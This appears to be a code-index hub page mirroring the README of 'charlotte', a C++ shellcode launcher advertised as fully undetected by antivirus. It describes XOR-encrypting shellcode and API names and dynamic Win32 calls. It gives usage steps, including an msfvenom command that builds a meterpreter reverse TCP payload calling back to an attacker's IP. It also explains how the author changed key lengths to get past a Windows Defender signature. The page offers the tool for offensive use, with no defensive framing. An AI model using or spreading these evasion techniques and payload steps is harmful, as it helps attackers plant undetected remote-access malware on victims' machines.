MCPcopy Index your code
hub / github.com/9emin1/charlotte

github.com/9emin1/charlotte @main

Chat with this repo
repository ↗ · DeepWiki ↗ · + Follow
7 symbols 18 edges 2 files 0 documented · 0%
What it actually does AI analysis from the code graph — generated when you open this
loading…
README

charlotte

c++ fully undetected shellcode launcher ;)

releasing this to celebrate the birth of my newborn

description

13/05/2021:

  1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
  2. dynamic invoking of win32 api functions
  3. XOR encryption of shellcode and function names
  4. randomised XOR keys and variables per run
  5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!

17/05/2021:

  1. random strings length and XOR keys length

antiscan.me

alt_text

usage

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py

example: 1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* 2. cd charlotte 3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin 4. python charlotte.py 5. profit

tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload

alt_text

update v1.1

17/05/21:

apparently Microsoft Windows Defender was able to detect the .DLL binary,

and how did they flag it? by looking for several XOR keys of 16 byte size

changing it to 9 shown in the POC .gif below shows it is now undetected again

cheers!

alt_text

Core symbols most depended-on inside this repo

get_random_string
called by 26
charlotte.py
xor
called by 5
charlotte.py
XOR
called by 5
template.cpp
charlotte
called by 1
charlotte.py
main
called by 1
charlotte.py
DllMain
called by 0
template.cpp
RunME
called by 0
template.cpp

Shape

Function 7

Languages

Python57%
C++43%

Modules by API surface

charlotte.py4 symbols
template.cpp3 symbols

For agents

$ claude mcp add charlotte \
  -- python -m otcore.mcp_server <graph>

⬇ download graph artifact